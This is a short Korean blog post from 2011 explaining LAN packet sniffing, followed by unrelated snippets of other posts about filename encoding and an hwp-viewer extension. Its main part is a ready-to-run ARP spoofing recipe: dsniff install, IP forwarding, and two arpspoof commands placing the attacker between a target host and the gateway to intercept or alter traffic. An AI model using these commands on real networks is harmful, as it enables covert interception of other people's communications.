2011년 8월 8일 월요일
스니핑(sniffing)은 패킷을 감청하는 것을 의미한다.
허브에 PC1~PC8까지 연결되어 있다고 할 경우,
그 중 임의의 컴퓨터에서 자신을 포함한 다른 컴퓨터에서 보내는 패킷을 감청할 수 있다.
자신의 랜카드가 promiscuous 모드를 지원한다면, wireshark 로 보면 된다.
자신의 랜카드가 promiscuous 모드를 지원하지 않을 경우에는 wireshark로 보면 자신의 것밖에는 보이지 않는다. 이 경우, arpspoof 를 이용한다. arpspoof 는 dsniff 패키지에 들어있다.
apt-get install dsniff
# ip forward 기능 활성화
echo 1 > /proc/sys/net/ipv4/ip_forward
# gateway ip: 192.168.10.1 또는 192.168.1.1, 게이트웨이 IP는 다를 수 있다.
# 목표물 ip: 192.168.10.5
arpspoof -t 192.168.10.5 192.168.10.1 &
arpspoof -t 192.168.10.1 192.168.10.5 &
이렇게 하면 공격자가 목표물과 gateway 사이에 끼어들게 된다.
목표물(192.168.10.5) -- 공격자 -- gateway -- 외부 네트워크
따라서 패킷 감청, 변조가 가능하다. ngrep, wireshark 등의 프로그램으로 패킷을 감청할 수 있다.
작업을 끝낸 후에는 killall arpspoof 명령으로 위의 프로세스를 죽이도록 하자.
-
인터넷에서 웹 브라우저로 파일을 받으면 서버 측의 잘못된 설정으로 인하여 한글 파일 이름이 이상하게 되는 경우가 많다. cp949 코드가 utf-8 로 둔갑된 경우 사용자 컴퓨터 환경이 utf-8 환경이라면 그 파일 이름 자체가 utf-8 이기 ...
-
달콤(Dalkom)은 리브레오피스에서 hwp 문서를 보기 위한 확장 기능입니다. libhwp 와 연동에 성공하여 hwp 문서에 있는 문자를 리브레오피스에서 볼 수 있습니다. 시간상의 이유 때문에 우선적으로 문자만 작업했습니다. 렌더링을 리브레오피... -
그 동안 제가 끝글자 버그를 잡지 않고 방치한 이유 우선 책임, 의무가 없습니다. 제가 해당 어플 개발자도 아닐 뿐더러 오픈소스가 원래가 유지보수 의무, 보증 책임이 없습니다 . 이렇게 개떡 같은 게 오픈소스입니다. 전 과거 libhwp 하냐고...
댓글 없음:
댓글 쓰기